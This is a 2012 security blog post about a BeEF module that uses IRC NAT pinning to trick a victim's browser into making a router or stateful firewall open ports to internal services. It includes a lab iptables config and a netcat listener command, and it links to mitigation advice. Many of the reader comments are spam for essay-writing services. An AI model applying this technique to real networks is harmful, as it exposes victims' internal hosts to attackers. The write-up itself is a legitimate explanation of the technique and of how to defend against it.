Saturday, July 14, 2012

Opening closed ports on NAT device and bypassing stateful firewalls with BeEF

Today's guest post comes from Bart Leppens. Thank you!

In 2010 Samy Kamkar discovered a method that he called "NAT Pinning."  The idea was, an attacker lures a victim to a web page and that web page forces the victim's router or firewall to forward any port number back to the user's machine.  The router, firewall, NAT-device must support connection tracking.  Samy Kamkar has successfully tested this on a Belkin N1 Vision Wireless Router.

Now, IRC NAT Pinning is integrated in BeEF as a module. It requires the victim to use Firefox due to blocked port number 6667 in most other browsers.  In this example, iptables is used to demonstrate how it actually works.

Let's imagine the following network:

And the configuration for iptables on the NAT/firewall:
 
#! /bin/sh

# DEFs
OUTIF=eth0
LANIF=eth1
LAN=192.168.1.0/24

# MODULES
modprobe ip_conntrack
modprobe ip_conntrack_ftp
modprobe iptable_nat

# Cleaning
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

# Kernel vars
echo 1 > /proc/sys/net/ipv4/ip_forward

# Allow unlimited traffic on the loopback interface
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT

# Set default policies
iptables --policy INPUT DROP
iptables --policy OUTPUT DROP
iptables --policy FORWARD DROP

# Previously initiated and accepted exchanges bypass rule checking
# Allow unlimited outbound traffic
iptables -A OUTPUT -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

# Allow inbound traffic on LAN
iptables -A INPUT -i $LANIF -j ACCEPT

# NAT
##########
iptables -t nat -A POSTROUTING -o $OUTIF -j MASQUERADE

# initiated and accepted exchanges from WAN to LAN
iptables --append FORWARD -m state --state ESTABLISHED,RELATED -i $OUTIF -o $LANIF -j ACCEPT

# Allow unlimited outbound traffic from LAN to WAN
iptables --append FORWARD -m state --state NEW,ESTABLISHED,RELATED -o $OUTIF -i $LANIF -j ACCEPT


iptables -A INPUT -j LOG --log-level debug
iptables -A INPUT -j DROP
iptables -A FORWARD -j LOG --log-level debug
iptables -A FORWARD -j DROP


Iptables must accept RELATED inbound connections and the IRC connection tracking modules must be loaded.

Suppose that machine with IP 192.168.1.100 has an Apache-webserver running on port 80 to serve some intranet, and that this site is normally not reachable from the outside (probably the Internet).

When the attack is executed, BeEF creates a temporary socket that listens on port 6667 for incoming TCP connections. The demo used netcat for this "nc -l -p 6667", but thanks to Antisnatchor, this isn't needed anymore!

Once this is done, we must fill in the correct parameters in BeEF and then try if the port has been opened. 

This can be seen on the following video:



The same can be attempted without NAT.  In this case a stateful firewall (e.g. iptables) also needs to accept RELATED inbound connections and the IRC Connection Tracking module must be loaded.


Imagine now that telnetd is running on the victims machine, but it isn't reachable due to the packet filtering of the firewall.  In BeEF, you can do this exactly as shown before. But, in this case, the private IP is the victim's public IP and the private port is the telnet port (probably 23).

If you're using iptables and you want to avoid problems with connection tracking, please refer to the secure use of iptables and connection tracking helpers.  These are the best practices to make use of connection trackers.

19 comments:

  1. I think in the top image the gateway ip's address should be 72.12.13.4, is that correct? at least that's what i see in the video at the end....

    So...You can control the internal ip also on which the forward is done?

    ReplyDelete
  2. Yes, the gateway ip should be 72.12.13.4. My bad!
    The internal IP can be fully controlled and doesn't need to be the victims IP one.

    ReplyDelete
  3. This comment has been removed by the author.

    ReplyDelete
  4. Hi,

    I have contributed a script for Nmap a while back that checks for vulnerable firewalls based on Eric Leblond's work on opensvc ( https://home.regit.org/2012/06/opensvp-a-new-tool-to-analyse-the-security-of-firewalls-using-algs/ ). You can find the script here, http://nmap.org/nsedoc/scripts/firewall-bypass.html

    Cheers,
    Hani.

    ReplyDelete
    Replies
    1. That's just fantastic Hani! I'll look at it more in detail.

      Delete
  5. Actually, I have investigated this issue.
    But it's difficult to explain in 2 words.
    Thus, read here - essay writing service.

    ReplyDelete
  6. Looking for a decent paper writing service? Wanna save your time? Try out this service, guys!

    ReplyDelete
  7. I Studied in my university life at CiscoPacket and now i have find something new for you and that is Research Paper Help Online which is best for all student

    ReplyDelete
  8. This article is very nice as well as very informative. I have known very important things over here. I want to thank you for this informative read net worth

    ReplyDelete
  9. Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.

    Selenium with python Training in Electronic City

    ReplyDelete
  10. All Online Assignment help is a web portal where students get help in making assignments for all the subjects, with the help of our experts. You will get 100% plagiarism free assignment. Expert’s consultation is also available for students. If they have any query they can contact with our experts anytime.

    ReplyDelete
  11. Acquire custom essay help via one of the experts of the MyAssignmenthelp which offers affordable writers assistance and essay writing service online in the UK.We have team of essay writer in UK who offer quality & timely essay help & essay writing service UK at affordable prices,Get the fullest satisfaction and discounts from our writing assistance!

    ReplyDelete
  12. My Assignment Services, is well-known for its 24-hour online Assignment Help on the WhatsApp platform. Students can reach out to us with their queries at any point of the day or night and get the most effective solutions for them. University assessments have to follow specific referencing and citation styles like Harvard, APA, Chicago and MLA. Also, they should be referenced only from credible academic sources. Our best online academic help experts talk about how to select and evaluate the right academic sources, which will help you clear all your academic-related doubts. Assignment Service by My Assignment Services has been trusted by millions of students worldwide for over a decade. We have been providing complete academic assistance to students struggling with their college and university tasks. We have a team of dedicated subject matter experts who maintain a 100% record of submitting orders well before the deadline. This also gives the students some time to review them and ask for revisions, if needed. You can trust our academic ghostwriters completely to get best quality write-ups including case studies, research proposals, dissertations and Assignment Help Melbourne, and more.

    ReplyDelete
  13. Sample Assignment provides an all-year long assignment help Adelaide While providing the academic aid, we foresee ourselves to be known as the chosen one academic consultants like Nursing, IT, Law, Marketing, Economics, Accounting, Statistics, etc. are some of the subjects to name that we cater to the Australian students in. We were recently recognised as the most reliable and dependable statistics assignment help service, and also voted as the Numero Uno assignment provider for the past two years. The academic assignment maker have been using their past experience and knowledge in order to supply the students with HD grade assignments including dissertations, essays, thesis, reports, journals, reflections, case study analysis, etc. There are many companies in the industry which functioning at skyrocketed prices. Be it accounting assignment help, marketing assignment help, java assignment help, taxation assignment help; we proffer our expert guidance in all of the assignments.

    ReplyDelete
  14. My Dissertation Services is well-known for its 24-hour online Dissertation Help provide. Students can reach out to us with their queries at any point of the day or night and get the most effective solutions for them. We provide the best dissertation service.

    ReplyDelete
  15. Amazing blog with the latest information. Your blog helps me to improve myself in many ways. Looking forward for more like this.
    AllAssignmenthelp.com reviews

    ReplyDelete